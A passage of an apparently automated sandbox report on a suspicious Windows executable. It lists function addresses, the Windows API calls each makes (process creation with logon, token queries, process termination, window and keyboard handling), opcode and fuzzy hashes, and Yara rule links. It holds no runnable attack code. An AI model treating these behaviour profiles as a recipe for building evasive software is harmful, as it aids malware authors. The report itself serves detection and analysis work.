                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: d6f818077af360a2bc58fde8d604382120b659808ad54d7648349b86375f09bc
                                        • Instruction ID: e37df46aa2b4503165939de06d22db14bd0ec86e4ce8ef5ee7dcf2ed86e49bbb
                                        • Opcode Fuzzy Hash: d6f818077af360a2bc58fde8d604382120b659808ad54d7648349b86375f09bc
                                        • Instruction Fuzzy Hash: CBE1B2719083409FD724DF25C881BAEB7E0BF85314F14896DF899AB2A2DB31DD45CB92
                                        Function 0008920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00089241
                                        • GetWindowRect.USER32(?,?), ref: 000892A5
                                        • ScreenToClient.USER32(?,?), ref: 000892C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000892D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00089321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000C71EA
                                          • Part of subcall function 00089339: BeginPath.GDI32(00000000), ref: 00089357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 0a896ae99e82554cc735bf158aa2e6f91df40d757921ad0df82b2f3cdf3080c9
                                        • Instruction ID: 573c869e12c74a721eb93d570ba6232878f738fdebe1a3c5251d99b6315cf218
                                        • Opcode Fuzzy Hash: 0a896ae99e82554cc735bf158aa2e6f91df40d757921ad0df82b2f3cdf3080c9
                                        • Instruction Fuzzy Hash: 9C419F70105200AFD721EF24DC84FBA7BE8FB56324F180669F9A5872F2C7719985DB61
                                        Function 000E07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 000E080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000E0847
                                        • EnterCriticalSection.KERNEL32(?), ref: 000E0863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 000E08DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000E08F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000E0921
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 8fe5f0cea5b3b02575d9781545cf2519ada885f9ee8eab7892a6ffc12e07968e
                                        • Instruction ID: ffe2a991d6dee6f013d835cc9b63b191053dcab8dc38a72ec969b4102d04d94a
                                        • Opcode Fuzzy Hash: 8fe5f0cea5b3b02575d9781545cf2519ada885f9ee8eab7892a6ffc12e07968e
                                        • Instruction Fuzzy Hash: A7417A71900205EFDF14AF64DC85AAAB7B8FF44300F1440A5ED40AA297DBB0DEA4DFA0
                                        Function 001081DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,000CF3AB,00000000,?,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 0010824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 00108272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001082D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 001082E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 0010830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0010832F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: a2affd3f9faf9d9a6a61cd88e557c00f8dc41a14de492355c21c0093dfab69d7
                                        • Instruction ID: 3ea0cb1dc05ad034c1adcf6854546cb6dd12bec8fb97115265e58fe9be4e7538
                                        • Opcode Fuzzy Hash: a2affd3f9faf9d9a6a61cd88e557c00f8dc41a14de492355c21c0093dfab69d7
                                        • Instruction Fuzzy Hash: 2C417D34605644AFDF21CF15C899BE47BE1BB4A714F1852A9E6C84F6F2CBB1A881CF50
                                        Function 000D4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 000D4C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000D4CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000D4CEA
                                        • _wcslen.LIBCMT ref: 000D4D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000D4D10
                                        • _wcsstr.LIBVCRUNTIME ref: 000D4D1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: b1249965ba32c15966279e12187a09c55d42047d2e0e8d821cf2aba1e582e31b
                                        • Instruction ID: 9511553b699eb1a55205ca7e3d9fc32954a6078431bcdb19ffb68228598913d8
                                        • Opcode Fuzzy Hash: b1249965ba32c15966279e12187a09c55d42047d2e0e8d821cf2aba1e582e31b
                                        • Instruction Fuzzy Hash: 3321C272204305BBEB655B39AC49EBB7BDDDF45750F10812AF809CA292EAB1DC4196B0
                                        Function 000E581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                        • _wcslen.LIBCMT ref: 000E587B
                                        • CoInitialize.OLE32(00000000), ref: 000E5995
                                        • CoCreateInstance.OLE32(0010FCF8,00000000,00000001,0010FB68,?), ref: 000E59AE
                                        • CoUninitialize.OLE32 ref: 000E59CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: bd8fecd69f09dadb641929ef73525629f502f8433df7eadb3d8b0cd85a20f1c5
                                        • Instruction ID: 445c55a5bb36202d42eccdbea2dd960f4c68b55dc85f324d372a5d05f820ff1e
                                        • Opcode Fuzzy Hash: bd8fecd69f09dadb641929ef73525629f502f8433df7eadb3d8b0cd85a20f1c5
                                        • Instruction Fuzzy Hash: 32D16470A047019FC714DF25C880A6ABBE1FF89719F14895DF889AB362DB31EC45CB92
                                        Function 000D175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000D0FCA
                                          • Part of subcall function 000D0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000D0FD6
                                          • Part of subcall function 000D0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000D0FE5
                                          • Part of subcall function 000D0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000D0FEC
                                          • Part of subcall function 000D0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000D1002
                                        • GetLengthSid.ADVAPI32(?,00000000,000D1335), ref: 000D17AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000D17BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D17C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 000D17DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,000D1335), ref: 000D17EE
                                        • HeapFree.KERNEL32(00000000), ref: 000D17F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        • Opcode ID: ac904c04eb1473363cd3da847ec81d5db5e24f72195419ef147e067f88139f27
                                        • Instruction ID: d12df335ca4554dad81ef16389f251ff4e50c385a724e8d5772c4cfaa72e840b
                                        • Opcode Fuzzy Hash: ac904c04eb1473363cd3da847ec81d5db5e24f72195419ef147e067f88139f27
                                        • Instruction Fuzzy Hash: 7E116A71605305FBDB109FA4CC49BEE7BB9FB45355F10425AF48197220DB75A984CBA0
                                        Function 000D14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000D14FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000D1506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000D1515
                                        • CloseHandle.KERNEL32(00000004), ref: 000D1520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000D154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 000D1563
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: c6f70084394b91afa322cb36ab22988a7b1e87e58e2bdf6a5996c5c15194281a
                                        • Instruction ID: 89239ed86c7a470522b6993ac9a1013ee92c5bdb50f45580762339effd1a4d2f
                                        • Opcode Fuzzy Hash: c6f70084394b91afa322cb36ab22988a7b1e87e58e2bdf6a5996c5c15194281a
                                        • Instruction Fuzzy Hash: 84112972500209FBDF118F98ED49BDE7BA9FF48744F048115FA45A21A0C7B58EA0DBA0
                                        Function 00093382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00093379,00092FE5), ref: 00093390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0009339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000933B7
                                        • SetLastError.KERNEL32(00000000,?,00093379,00092FE5), ref: 00093409
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: e0b7bb2ac9b89a65c742ceaa5506df81cb37d22dd1f294e54cfec783c4e9ed69
                                        • Instruction ID: 086a9038020b77ce7fcca14babae2f60dda24db0ede0b4bfa2817e296a3b2c6d
                                        • Opcode Fuzzy Hash: e0b7bb2ac9b89a65c742ceaa5506df81cb37d22dd1f294e54cfec783c4e9ed69
                                        • Instruction Fuzzy Hash: EE01243260D311BEEF2827B47C859AB2A94EB053793208329F510942F2EF114E427E84
                                        Function 000A2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,000A5686,000B3CD6,?,00000000,?,000A5B6A,?,?,?,?,?,0009E6D1,?,00138A48), ref: 000A2D78
                                        • _free.LIBCMT ref: 000A2DAB
                                        • _free.LIBCMT ref: 000A2DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0009E6D1,?,00138A48,00000010,00074F4A,?,?,00000000,000B3CD6), ref: 000A2DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0009E6D1,?,00138A48,00000010,00074F4A,?,?,00000000,000B3CD6), ref: 000A2DEC
                                        • _abort.LIBCMT ref: 000A2DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: ee57853fbdb747f88e1f3ba67d13df4838f66f905d88e50cf4e2d160a4266687
                                        • Instruction ID: 751c95507a3614033c48a7ad6164cb308fda765ca6ff934bb8400b97f4d4bb81
                                        • Opcode Fuzzy Hash: ee57853fbdb747f88e1f3ba67d13df4838f66f905d88e50cf4e2d160a4266687
                                        • Instruction Fuzzy Hash: AEF0C8355056006BC26227FDBC06F9F269ABFC37A1F254538F824965D3EF64884156A1
                                        Function 00108A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896A2
                                          • Part of subcall function 00089639: BeginPath.GDI32(?), ref: 000896B9
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00108A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 00108A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00108A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 00108A80
                                        • EndPath.GDI32(?), ref: 00108A90
                                        • StrokePath.GDI32(?), ref: 00108AA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: c5e8c2aae3447f6a9ef96f71aca2a238b4391ed3ffd9a5ff9cc2ce8724f59bc0
                                        • Instruction ID: deac18f49d420ab813253f2ccb5f648ac87f89cbacfa21b9a89468ddc69a160f
                                        • Opcode Fuzzy Hash: c5e8c2aae3447f6a9ef96f71aca2a238b4391ed3ffd9a5ff9cc2ce8724f59bc0
                                        • Instruction Fuzzy Hash: 3B111E7600010CFFEF119F90DC88EAA7F6CEB04354F048111FA59965A1C7B19D95DFA0
                                        Function 000D51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000D5218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 000D5229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000D5230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 000D5238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000D524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 000D5261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: a30e0a37fc16584d6cd2c79bd9b08b419880160021f905d4fac6c2eb12d1557c
                                        • Instruction ID: 365846fe4f2660d7d7f4c8069c0b937429ede736e580904d2a9420f27f96e539
                                        • Opcode Fuzzy Hash: a30e0a37fc16584d6cd2c79bd9b08b419880160021f905d4fac6c2eb12d1557c
                                        • Instruction Fuzzy Hash: 8301A275E00708BBEB109BA59C49F5EBFB8EF48351F048166FA04A7381D6709C04CFA0
                                        Function 00071BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00071BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00071BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00071C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00071C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00071C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00071C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: e11daf01b1266d4ffb413bda48faccaec43ca0e7dfbb155b6ba3cd985739000d
                                        • Instruction ID: a518da9e2afb4820abe64af39d2a65d470563fd3276723c212b94078b0d478ec
                                        • Opcode Fuzzy Hash: e11daf01b1266d4ffb413bda48faccaec43ca0e7dfbb155b6ba3cd985739000d
                                        • Instruction Fuzzy Hash: F3016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CFE5
                                        Function 000DEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000DEB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000DEB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 000DEB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: f0c7aaa7227582a67cb4dbd006626fef3d14c3034e6868a336eca911deefd547
                                        • Instruction ID: 7de246f2fd2647ea83fa315586831dacdcba62e179cee4a659d9f25695d61b7b
                                        • Opcode Fuzzy Hash: f0c7aaa7227582a67cb4dbd006626fef3d14c3034e6868a336eca911deefd547
                                        • Instruction Fuzzy Hash: 89F09A72200258BBE7205B629C0EEEF3A7CEFCAB11F000259F641D1190E7E11A41CEF4
                                        Function 000C7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?), ref: 000C7452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 000C7469
                                        • GetWindowDC.USER32(?), ref: 000C7475
                                        • GetPixel.GDI32(00000000,?,?), ref: 000C7484
                                        • ReleaseDC.USER32(?,00000000), ref: 000C7496
                                        • GetSysColor.USER32(00000005), ref: 000C74B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: e9d1e402404cf9921d1ee3ab5ccf1ba5c8c5729bb8a9d2cc2bd9f943b1e36984
                                        • Instruction ID: 07835df4edf98d059a24f79d09a6a0818f20e30cb1f7f6423fde8cf28ef7e1b2
                                        • Opcode Fuzzy Hash: e9d1e402404cf9921d1ee3ab5ccf1ba5c8c5729bb8a9d2cc2bd9f943b1e36984
                                        • Instruction Fuzzy Hash: 68018B31500205EFDB605F64DC08FEEBBB6FB04321F100264FA59A25A0CF711E81AF90
                                        Function 000D1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
